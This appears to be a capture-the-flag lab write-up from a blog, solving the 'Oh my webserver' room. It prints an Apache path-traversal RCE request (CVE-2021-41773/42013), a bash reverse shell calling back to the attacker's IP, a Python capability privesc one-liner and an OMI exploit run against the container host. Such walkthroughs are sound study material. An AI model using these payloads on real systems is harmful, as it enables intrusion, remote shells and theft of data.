Oh my webserver

This is a great room created by tinyBoy, where we get RCE using Apache and obtain a reverse shell, after that we can do privesc using Python and after shockingly discovering the user flag on the root directory, we realize we’re trapped in a container. Finally, we use some exploit against the host machine to obtain the final flag.

Photo by panumas nikhomkhai from Pexels

room

Useful stuff

Discovery

Nmap

# Nmap 7.92 scan initiated Fri Mar  4 15:22:30 2022 as: nmap -sC -sV -p- -vv -oA scan -Pn 10.10.185.209
Nmap scan report for 10.10.185.209 (10.10.185.209)
Host is up, received user-set (0.23s latency).
Scanned at 2022-03-04 15:22:31 EST for 410s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMlfGBGWZkPg98VnvD+FVeesHsQwmtoJfMOMhifMjxD9AEluFQNVnoyxyQi5y9O2/AN/MO+l57li33lHiVjD1eglBjB3Lkzz3tpRJSmGn2Ug3jRypShkSJ9VkUVFElw8MXke62w3+9pi+S0Ub1DqcttGH8TqihiWvqJbJYnecqjdcka1uKPdPna0gleow9JiaAH3X4EMFdcXZDOGgnOaZId2mEXFDeNNYFZpS+EOcLgXaAp1NobUckE9NXvE73qw+pBNo69m3z4MG7/cJNIsQiFpm5yqgCKJGjhwGFp4zAMXOD23lj1g+iQlwrchwY5nBEHHae1PjQwLjwuWebjWR+bWPalPVYa4d8+15TjjgV8VW/Rac3rTX+A/buyVxUSMhkBtn7fQ2sLoMPPn7vRDo3ggGl5IZaYIvSYRDk9nadsZk+YKUCSgFf97z0PK278vbrPwjJTyyScAnjvs+oLnD/bAdja4uwOOS2CHehjzipVmWf7zR3srIfjZQ4aAUmeh8=
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLf6FvNwGNtpra24lyJ4YWPqB8olwPXhKdr6gSW6Dc+oXdZJbQPtpD7cph3nvR9sQQnTKGiG69XyGKh0ervYI1U=
| 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEzBDIQu+cp4gApnTbTbtmqljyAcr/Za8goiY57VM+uq
80/tcp closed http reset ttl 60
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 4 15:29:21 2022 -- 1 IP address (1 host up) scanned in 410.87 seconds

Gobuster

/.hta                 (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 45]

After visiting the site we see that there’s not much for us to exploit…

I used Wappalyzer to see that we were dealing with Apache’s version 2.4.49 so I decided to do some research and ended up founding CVE-2021–41773 & CVE-2021–42013

Foothold

If you want to learn more about the exploit I highly advice you to check out this other room, since I also used it in order to get the initial access.

Apache Exploitation

First I used this request just to see if I could get the passwd file

curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"

Since I was able to get it I decided to use this one liner to leverage a reverse shell

sh -i >& /dev/tcp/10.13.19.12/1234 0>&1

Now let’s just includ it in our original request

curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.13.19.12/1234 0>&1' -H "Content-Type: text/plain"

and before sending it, let’s start our listener

nc -lnvp 1234

Great! Now we’re in.

The first odd thing that pops up, is the fact that there are no users on the machine. Weird, isn’t it? Since there seems to be no user flag anywhere I decided to do some Privilege Escalation.

Privesc

I uploaded Linpeas to the machine by first downloading the bash script and starting a local http server using python

python3 -m http.server 80

and downloading it on the other machine using curl, inside the tmp directory

curl http://10.13.19.12/linpeas.sh -o linpeas.sh

now give it permissions

bash +x linpeas.sh

and finally run it

./linpeas.sh

Once its done, we analyze the output and find that Python has Capabilities (great!) and it also seems we’re trapped inside a container…

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: = cap_chown

/usr/bin/python3.7 = cap_setuid+ep

So the next thing is to leverage Python to obtain root. For this I used GTFOBins

python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Then we can get user flag :D

Escaping

So…we’re root, but we’re still trapped…let’s see what can we do now

After reviewing the Linpeas output, we find our IP is 172.17.0.2, so we can assume the host’s IP is…wait for it…172.17.0.1…great!

════════════════════════════════════╣ Network Information ╠════════════════════════════════════
╔══════════╣ Hostname, hosts and DNS
f1984047b638
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 f1984047b638

nameserver 10.0.0.2
search eu-west-1.compute.internal

in the tmp folder, where we uploaded the beautiful peas, we find a weird script called omi.py, which is based on this CVE. Since we know that the machine we’re in isn’t vulnerable, we can make a wild guess and try it against the host.

I did this

python3 omi.py -t 172.17.0.1 -c whoami

and got root, but since we’re already root, it’s kind of confusing…so Iran this instead

python3 omi.py -t 172.17.0.1 -c pwd

and boooom, we got a hit. Now the last thing is hope that we can get our flag.

python3 omi.py -t 172.17.0.1 -c "cd /root; cat root.txt"

And that’s all :)

I enjoyed this machine a ton, since it uses a recent CVE and the container is a little nice twist, thanks to the box creator.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store